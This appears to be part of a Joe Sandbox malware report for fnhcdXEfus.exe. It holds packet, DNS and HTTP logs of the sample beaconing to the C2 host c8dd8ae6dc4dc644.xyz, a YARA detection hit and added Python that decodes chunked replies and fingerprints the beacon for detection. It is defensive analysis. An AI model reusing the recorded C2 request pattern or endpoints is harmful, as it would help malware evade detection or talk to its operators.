Jan 30, 2021 14:31:38.112478018 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:38.123282909 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:38.123300076 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:38.228832006 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:39.173599005 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:39.186463118 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:39.186546087 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:39.374016047 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:39.374053955 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:41.303073883 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:43.455353975 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:43.545784950 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:43.785324097 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:43.785418987 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:43.972913027 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:43.972959042 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:45.013859987 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:45.142966032 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:45.143001080 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:45.332947016 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:45.332983971 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:49.696033001 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:49.710333109 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:49.900924921 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:50.896301031 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:51.025131941 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:07.928347111 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:07.928493023 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:08.116095066 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:08.116117001 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:12.093523979 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:12.136184931 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:18.248153925 CET  49739     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:18.436991930 CET  80        49739     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:18.437107086 CET  49739     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:18.439049006 CET  49739     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:18.627670050 CET  80        49739     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:20.674977064 CET  80        49739     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:20.675368071 CET  49739     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:20.863068104 CET  80        49739     34.94.64.66   192.168.2.3
Jan 30, 2021 14:32:20.863217115 CET  49739     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:32:23.566790104 CET  49722     80        192.168.2.3   34.94.64.66
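Read packet by packet, the table above hides its shape: every TCP row is one of four client ports on 192.168.2.3 talking to 34.94.64.66:80, and every UDP row in the next table is a DNS exchange with 8.8.8.8. The following is an added example, not part of the Joe Sandbox report, that collapses rows in that timestamp/source-port/dest-port/source-IP/dest-IP layout into flows keyed by client and server endpoint, counting packets per direction and the time span of each conversation. The sample rows are constructed from the two tables on this page (a few rows each, not the full capture), and the "lower port is the service" rule used to tell client from server is this example's own heuristic, adequate for 80 and 53 against ephemeral ports but not a general rule.

```python
# Added example (not part of the Joe Sandbox report): collapse the per-packet
# TCP/UDP tables into flows so the conversation structure is visible at a glance.
# SAMPLE_ROWS are constructed from the report's tables; the whitespace-separated
# column layout they use is this example's own.
import re
from typing import Dict, Iterable, List, Tuple

ROW_RE = re.compile(
    r"^\w{3} \d{1,2}, \d{4} (?P<h>\d{2}):(?P<m>\d{2}):(?P<s>\d{2}\.\d+) \w+\s+"
    r"(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<sip>[\d.]+)\s+(?P<dip>[\d.]+)$"
)

# (protocol, row) pairs; the protocol comes from the table heading each row sits under.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("TCP", "Jan 30, 2021 14:31:11.635849953 CET  49719  80     192.168.2.3  34.94.64.66"),
    ("TCP", "Jan 30, 2021 14:31:11.823514938 CET  80     49719  34.94.64.66  192.168.2.3"),
    ("TCP", "Jan 30, 2021 14:31:11.823671103 CET  49719  80     192.168.2.3  34.94.64.66"),
    ("TCP", "Jan 30, 2021 14:31:11.824554920 CET  49719  80     192.168.2.3  34.94.64.66"),
    ("TCP", "Jan 30, 2021 14:31:25.540046930 CET  49722  80     192.168.2.3  34.94.64.66"),
    ("TCP", "Jan 30, 2021 14:31:25.727830887 CET  80     49722  34.94.64.66  192.168.2.3"),
    ("UDP", "Jan 30, 2021 14:31:00.907012939 CET  55984  53     192.168.2.3  8.8.8.8"),
    ("UDP", "Jan 30, 2021 14:31:00.957948923 CET  53     55984  8.8.8.8      192.168.2.3"),
]

# (client_ip, client_port, server_ip, server_port)
FlowKey = Tuple[str, int, str, int]


def parse_row(proto: str, line: str) -> dict:
    """Parse one table row; the timestamp is reduced to seconds since midnight
    (all rows on this page share one date, so that is enough for durations)."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    secs = int(m["h"]) * 3600 + int(m["m"]) * 60 + float(m["s"])
    return {"proto": proto, "t": secs, "sport": int(m["sport"]),
            "dport": int(m["dport"]), "sip": m["sip"], "dip": m["dip"]}


def flow_key(pkt: dict) -> Tuple[FlowKey, str]:
    """Heuristic (this example's own): the lower-numbered port is the service side,
    the other side is the client. Returns the flow key and the packet direction."""
    if pkt["sport"] < pkt["dport"]:
        return (pkt["dip"], pkt["dport"], pkt["sip"], pkt["sport"]), "in"
    return (pkt["sip"], pkt["sport"], pkt["dip"], pkt["dport"]), "out"


def aggregate_flows(rows: Iterable[Tuple[str, str]]) -> Dict[FlowKey, dict]:
    """Group packets into flows with per-direction counts and first/last timestamps."""
    flows: Dict[FlowKey, dict] = {}
    for proto, line in rows:
        pkt = parse_row(proto, line)
        key, direction = flow_key(pkt)
        f = flows.setdefault(key, {"proto": proto, "out": 0, "in": 0,
                                   "first": pkt["t"], "last": pkt["t"]})
        f[direction] += 1
        f["first"] = min(f["first"], pkt["t"])
        f["last"] = max(f["last"], pkt["t"])
    return flows


def format_flows(flows: Dict[FlowKey, dict]) -> List[str]:
    """One line per flow, in order of first packet."""
    lines = []
    for (cip, cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        lines.append(f"{f['proto']} {cip}:{cport} -> {sip}:{sport}  "
                     f"out={f['out']} in={f['in']} dur={f['last'] - f['first']:.3f}s")
    return lines


if __name__ == "__main__":
    for line in format_flows(aggregate_flows(SAMPLE_ROWS)):
        print(line)
```

Fed the complete TCP table, this yields four flows to 34.94.64.66:80 (client ports 49719, 49722, 49723, 49739) whose packet counts and gaps are what to compare against the HTTP requests recorded elsewhere in the report; the duration column also makes the reuse of port 49722 across more than a minute visible in one line rather than forty.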

                                                                                                                                                                        UDP Packets


                                                                                                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 30, 2021 14:31:11.568495989 CET | 192.168.2.3 | 8.8.8.8 | 0xada2 | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:25.467396975 CET | 192.168.2.3 | 8.8.8.8 | 0xc24b | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:26.411195993 CET | 192.168.2.3 | 8.8.8.8 | 0x9506 | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:32:18.156292915 CET | 192.168.2.3 | 8.8.8.8 | 0xfc84 | Standard query (0) | C8DD8AE6DC4DC644.xyz | A (IP address) | IN (0x0001)

                                                                                                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 30, 2021 14:31:11.625024080 CET | 8.8.8.8 | 192.168.2.3 | 0xada2 | No error (0) | c8dd8ae6dc4dc644.xyz |  | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:25.526074886 CET | 8.8.8.8 | 192.168.2.3 | 0xc24b | No error (0) | c8dd8ae6dc4dc644.xyz |  | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:26.472259045 CET | 8.8.8.8 | 192.168.2.3 | 0x9506 | No error (0) | c8dd8ae6dc4dc644.xyz |  | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:32:18.213793039 CET | 8.8.8.8 | 192.168.2.3 | 0xfc84 | No error (0) | C8DD8AE6DC4DC644.xyz |  | 34.94.64.66 | A (IP address) | IN (0x0001)

                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                        • c8dd8ae6dc4dc644.xyz

                                                                                                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49719 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:11.824554920 CET | 144 | OUT | POST //fine/send HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 84
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:12.335077047 CET | 149 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:12.365892887 CET | 150 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:13.742291927 CET | 169 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:13.833859921 CET | 171 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:17.383786917 CET | 172 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:19.318113089 CET | 172 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:22.825290918 CET | 173 | IN | HTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:22 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49722 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:25.730926037 CET | 174 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:30.286595106 CET | 204 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:37.934276104 CET | 348 | OUT | POST /info_old/e HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 677
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:39.173599005 CET | 350 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 110
Jan 30, 2021 14:31:39.186463118 CET | 350 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:43.455353975 CET | 439 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:43.785324097 CET | 440 | OUT | POST /info_old/g HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 1405
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:45.013859987 CET | 526 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:45.142966032 CET | 527 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:49.696033001 CET | 534 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:49.710333109 CET | 534 | OUT | GET /info_old/r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:50.896301031 CET | 542 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:50 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: c6mtnVXGhd10~0
Jan 30, 2021 14:32:07.928347111 CET | 575 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 81
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:32:12.093523979 CET | 577 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:32:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 2
Source IP: 192.168.2.3
Source Port: 49723
Destination IP: 34.94.64.66
Destination Port: 80
Process: C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:26.687041998 CET | 175 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:32.487735033 CET | 228 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 30, 2021 14:31:33.553212881 CET | 228 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:38.112478018 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:31:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49739
Destination IP: 34.94.64.66
Destination Port: 80
Process: C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:32:18.439049006 CET | 3354 | OUT | GET /info_old/ddd HTTP/1.1
Host: C8DD8AE6DC4DC644.xyz
Accept: */*
Jan 30, 2021 14:32:20.674977064 CET | 5291 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Jan 2021 13:32:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a 30 0d 0a 0d 0a
Data Ascii: c4HAoZl5GFTc~0
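The Data Raw bytes in these sessions are HTTP/1.1 chunked bodies, so the Data Ascii column is misleading when read literally: `30 0d 0a 0d 0a` is `0\r\n\r\n`, the terminating last-chunk of an empty body, and the `/info_old/ddd` reply `63 0d 0a ... 0d 0a 30 0d 0a 0d 0a` is one 12-byte chunk (size line `c`) carrying `4HAoZl5GFTc~` followed by the last-chunk, which the report flattens to `c4HAoZl5GFTc~0`. The following is an added example, not Joe Sandbox code or anything extracted from the sample; it decodes the dumps above into the bodies the malware actually received, and fingerprints the `/info_old/w` check-in head using traits visible in the capture (a form POST under `/info_old/`, a Chrome User-Agent but a lower-case `upgrade-insecure-requests` name and no `Accept-Encoding`, which Chrome itself would send). The constants and function names are the example's own; the 81-byte POST body is not shown in the report and is not reconstructed.

```python
"""Decode the chunked 'Data Raw' dumps above and fingerprint the check-in head.

Added example; not Joe Sandbox code and not code from the sample.
"""

# Constructed from the 'Data Raw' lines of sessions 2 and 3 above.
EMPTY_REPLY_RAW = "30 0d 0a 0d 0a"
DDD_REPLY_RAW = ("63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a "
                 "30 0d 0a 0d 0a")

# Constructed from the first request of session 2 (head only; the 81-byte
# form body is not shown in the report).
BEACON_HEAD = (
    "POST /info_old/w HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
    "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
    "Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36\r\n"
    "upgrade-insecure-requests: 1\r\n"
    "Content-Length: 81\r\n"
    "Host: c8dd8ae6dc4dc644.xyz\r\n"
    "\r\n"
)


def raw_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump (the report's 'Data Raw' column) into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def decode_chunked(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer-coding body (RFC 7230 section 4.1).

    Each chunk is '<hex size>[;ext]' CRLF <data> CRLF; a zero size is the
    last-chunk, followed by optional trailer lines and one empty line.
    Malformed or truncated input raises ValueError rather than returning a
    partial body.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        # chunk extensions after ';' are ignored
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            # last-chunk: skip trailer lines, then require the closing empty line
            while body[pos:pos + 2] != b"\r\n":
                eol = body.find(b"\r\n", pos)
                if eol < 0:
                    raise ValueError("unterminated trailer section")
                pos = eol + 2
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError("truncated chunk")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def is_malformed_chunked(body: bytes) -> bool:
    """True when decode_chunked rejects the body."""
    try:
        decode_chunked(body)
    except ValueError:
        return True
    return False


def parse_head(raw: str):
    """Split a request head into (method, target, headers, header_names_as_sent)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers, names = {}, []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        names.append(name.strip())
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, names


def matches_beacon_profile(raw: str) -> bool:
    """True when a request head has the shape of the /info_old/w check-ins above."""
    method, target, h, names = parse_head(raw)
    return (method == "POST"
            and target.startswith("/info_old/")
            and h.get("content-type", "") == "application/x-www-form-urlencoded"
            and h.get("accept-language", "").startswith("ko-KR")
            and "Chrome/" in h.get("user-agent", "")
            and "upgrade-insecure-requests" in names   # Chrome capitalises this name
            and "accept-encoding" not in h)            # Chrome always sends one
```

The profile is deliberately narrow and keyed to this capture; in a live ruleset the host and path would come from the same report rather than being hard-coded, and the decoder is the part worth reusing, since it lets an analyst read the short tokens a C2 hands back (here `4HAoZl5GFTc~`) instead of the flattened ASCII column.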


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 14:31:06
Start date: 30/01/2021
Path: C:\Users\user\Desktop\fnhcdXEfus.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Imagebase: 0x400000
File size: 4453376 bytes
MD5 hash: 18169F98E39AE228D131AEC477C8A2E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
Reputation: low

General

Start time: 14:31:10
Start date: 30/01/2021
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
